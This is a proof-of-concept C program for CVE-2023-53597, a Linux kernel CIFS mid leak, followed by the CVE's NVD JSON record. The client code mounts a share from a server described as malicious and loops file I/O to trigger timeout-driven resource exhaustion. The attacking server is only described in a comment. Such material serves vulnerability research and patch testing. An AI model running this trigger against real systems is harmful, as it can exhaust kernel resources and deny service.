CVE-2023-53597

// CVE-2023-53597 PoC - Conceptual demonstration // This PoC demonstrates how to trigger the mid leak vulnerability // by causing STATUS_IO_TIMEOUT responses from a CIFS server. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mount.h> #include <fcntl.h> // Number of STATUS_IO_TIMEOUT responses needed to trigger reconnection // In vulnerable kernel, this constant was NUM_STATUS_IO_TIMEOUT #define MAX_STATUS_IO_TIMEOUT 4 /* * Step 1: Mount a CIFS share from a controlled server * The malicious server will deliberately respond with STATUS_IO_TIMEOUT */ int mount_malicious_share(const char *share_path, const char *mount_point) { char mount_opts[256]; snprintf(mount_opts, sizeof(mount_opts), "username=guest,password=,iocharset=utf8"); int ret = mount(share_path, mount_point, "cifs", 0, mount_opts); if (ret != 0) { perror("mount failed"); return -1; } printf("Mounted %s at %s\n", share_path, mount_point); return 0; } /* * Step 2: Continuously perform I/O operations on the mounted share * Each operation will trigger STATUS_IO_TIMEOUT from the malicious server */ void trigger_timeout_leak(const char *mount_point) { char file_path[256]; char buffer[4096]; int fd; // Loop to trigger enough timeouts to exceed MAX_STATUS_IO_TIMEOUT for (int i = 0; i < MAX_STATUS_IO_TIMEOUT * 10; i++) { snprintf(file_path, sizeof(file_path), "%s/testfile_%d", mount_point, i); // Attempt to open a file - this will trigger CIFS request fd = open(file_path, O_RDWR | O_CREAT, 0644); if (fd >= 0) { // Write data - server responds with STATUS_IO_TIMEOUT write(fd, buffer, sizeof(buffer)); close(fd); } // Small delay between operations usleep(100000); } printf("Triggered %d timeout responses\n", MAX_STATUS_IO_TIMEOUT * 10); } /* * Step 3: Monitor kernel for mid leaks * Check /proc/fs/cifs/Stats or kernel logs for evidence of resource exhaustion */ void check_leak_status() { printf("Checking system status for mid leaks...\n"); system("cat /proc/fs/cifs/Stats 2>/dev/null || echo 'Stats not available'"); system("dmesg | grep -i 'cifs' | tail -20"); } int main(int argc, char *argv[]) { if (argc < 3) { printf("Usage: %s <cifs_share> <mount_point>\n", argv[0]); printf("Example: %s //192.168.1.100/share /mnt/cifs\n", argv[0]); return 1; } printf("=== CVE-2023-53597 PoC ===\n"); printf("Linux Kernel CIFS Mid Leak Vulnerability\n\n"); if (mount_malicious_share(argv[1], argv[2]) != 0) { return 1; } trigger_timeout_leak(argv[2]); check_leak_status(); // Cleanup umount(argv[2]); printf("\nPoC completed. Check kernel logs for mid leak evidence.\n"); return 0; } /* * Server-side component (conceptual): * A malicious SMB/CIFS server should respond to requests with * NT_STATUS_IO_TIMEOUT status code. After receiving * MAX_STATUS_IO_TIMEOUT such responses, the vulnerable kernel * will trigger reconnection without properly releasing mids. */

{"cve": {"id": "CVE-2023-53597", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.270", "lastModified": "2026-03-23T18:21:30.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix mid leak during reconnection after timeout threshold\n\nWhen the number of responses with status of STATUS_IO_TIMEOUT\nexceeds a specified threshold (NUM_STATUS_IO_TIMEOUT), we reconnect\nthe connection. But we do not return the mid, or the credits\nreturned for the mid, or reduce the number of in-flight requests.\n\nThis bug could result in the server->in_flight count to go bad,\nand also cause a leak in the mids.\n\nThis change moves the check to a few lines below where the\nresponse is decrypted, even of the response is read from the\ntransform header. This way, the code for returning the mids\ncan be reused.\n\nAlso, the cifs_reconnect was reconnecting just the transport\nconnection before. In case of multi-channel, this may not be\nwhat we want to do after several timeouts. Changed that to\nreconnect the session and the tree too.\n\nAlso renamed NUM_STATUS_IO_TIMEOUT to a more appropriate name\nMAX_STATUS_IO_TIMEOUT."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9.5", "versionEndExcluding": "5.15.150", "matchCriteriaId": "B2D56558-DCDD-4670-9433-8C92DAD277A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.42", "matchCriteriaId": "6E769E6A-7EEF-4FA8-BF41-6CA1CE537361"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/57d25e9905c71133e201f6d06b56a3403d4ad433", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69cba9d3c1284e0838ae408830a02c4a063104bc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c55901d381a22300c9922170e59704059f50977b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/df31d05f0678cdd0796ea19983a2b93edca18bb0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}